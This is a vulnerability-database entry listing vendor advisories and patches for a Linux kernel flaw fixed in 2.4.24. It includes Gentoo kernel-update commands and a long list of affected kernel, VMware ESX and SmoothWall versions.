Debian has released an advisory (DSA 423-1) that addresses the issue that is described in this BID for the IA-64 architecture. Further details regarding obtaining and applying fixes can be found in the referenced advisory.

SmoothWall has released fixes to address this issue in SmoothWall Express 2.0. Users are advised to obtain the fixes through the SmoothWall interface. Please see the referenced web page (SWP-2004:001) for more information. Users may download the fixes1 patch by carrying out the following steps:

Go to Maintenance -> Updates on your SmoothWall web interface, and upload
the file called fixes1.

Debian has released advisory DSA 413-1 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2003:417-01 to address this issue. RHSA-2003:419-05 was also released to address Red Hat Enterprise distributions. An advisory (FEDORA-2003-046) was also released for Fedora distributions. See the referenced advisories for additional details.

Guardian Digital has released advisory ESA-20040105-001 for EnGarde Secure Linux. Fixes included in this advisory may be applied with the Guardian Digital WebTool.

Conectiva has released advisories CLA-2004:799 and CLSA-2004:804 to address this issue. Please see the attached advisories for details on obtaining and applying fixes.

Trustix has released advisory TSLSA-2004-01 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Astaro Security Linux has released kernel updates to address this issue in Up2Date 4.018.

SuSE has released security advisory SuSE-SA:2004:001 to address this issue. SuSE has also released security advisory SuSE-SA:2004:003 to address this issue for the 64bit kernel.

An advisory (IMNX-2004-73-001-01) was released for Immunix Secured OS that includes fixes to address this issue. Please see the referenced advisory for details on obtaining and applying fixes.

TurboLinux released an advisory (TLSA-2004-1) that includes fixes for this issue. Please see the attached reference for details on obtaining and applying fixes.

This issue has been addressed in the 2.4.24 release of the Linux kernel. This issue has also been addressed in the 2.6 series as of the 2.6.1-rc2 release.

Debian has issued fixes for the PowerPC and Alpha platforms. See advisory DSA 417-2 in the reference section.

Slackware has released advisories SSA:2004-006-01 and SSA:2004-008-01 to address this issue.

Mandrake has released advisory MDKSA-2004:001 to address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Gentoo has released advisory GLSA 200401-01 to address this issue. Please see the attached advisory for more details. Gentoo fixes can be applied by carrying out the following commands:

emerge sync
emerge -pv your-favorite-sources

# IMPORTANT: IF YOUR KERNEL IS MARKED AS "Manual Update" THEN
# THE PORTAGE MAY REPORT THAT YOU HAVE THE SAME KERNEL ON
# YOUR SYSTEM. YOU SHOULD STILL UPDATE YOUR KERNEL!

emerge your-favorite-sources

# Follow usual procedures for compiling and installing a kernel.
# If you use genkernel, run genkernel as you would do normally.

SmoothWall has released alert SWP-2004:001 to address this issue.

Debian has issued fixes for the mips/mipsel architectures. See advisory DSA-427-1 (in the reference section).

SGI has released a security advisory 20040102-01-U including fixes to address this issue. Please see the attached advisory for more information.

VMWare has released a fix to address this issue in VMWare ESX Server 2.0.1 build 6403. Please see the referenced web page for more information.

Debian has released two advisories DSA-439-1 and DSA-440-1 to address this and other issues. Please see the referenced advisories for more information.

Debian has released DSA 442-1 to provide fixes for s390 platforms. Please see the attached advisory for further information.

Debian has released DSA 450-1 to provide MIPS kernel fixes. Please see the attached advisory for further details.

SGI has released an advisory 20040204-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

Debian has released DSA 470-1 to address this and other issues in the HP Precision architecture. Please see the referenced advisory for more information.

VMWare advisory and fixes available for their ESX server package. Please see th reference section for more information.

Debian has released advisory DSA 475-1 with fixes dealing with this and other issues for the HP Precision architecture.


Sun Cobalt RaQ 550

VMWare ESX Server 2.0

SmoothWall Express 2.0 beta

SmoothWall Express 2.0 beta6

VMWare ESX Server 2.0.1 build 6403

VMWare ESX Server 2.0.1

Linux kernel 2.4 .0-test3

Linux kernel 2.4 .0-test6

Linux kernel 2.4 .0-test8

Linux kernel 2.4 .0-test7

Linux kernel 2.4

Linux kernel 2.4 .0-test2

Linux kernel 2.4 .0-test11

Linux kernel 2.4 .0-test10

Linux kernel 2.4 .0-test4

Linux kernel 2.4 .0-test1

Linux kernel 2.4 .0-test5

Linux kernel 2.4.1

Linux kernel 2.4.11

Linux kernel 2.4.12

Linux kernel 2.4.13

Linux kernel 2.4.14

Linux kernel 2.4.15

Linux kernel 2.4.16

Linux kernel 2.4.17

Linux kernel 2.4.18 pre-8

Linux kernel 2.4.18 pre-7

Linux kernel 2.4.18

Linux kernel 2.4.18 pre-6

Linux kernel 2.4.18 pre-3

Linux kernel 2.4.18 pre-2

Linux kernel 2.4.18 pre-4

Linux kernel 2.4.18 pre-5

Linux kernel 2.4.18 x86

Linux kernel 2.4.19 -pre4

Linux kernel 2.4.19 -pre1

Linux kernel 2.4.19 -pre6

Linux kernel 2.4.19 -pre2

Linux kernel 2.4.19

Linux kernel 2.4.19 -pre5

Linux kernel 2.4.19 -pre3

Linux kernel 2.4.21

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站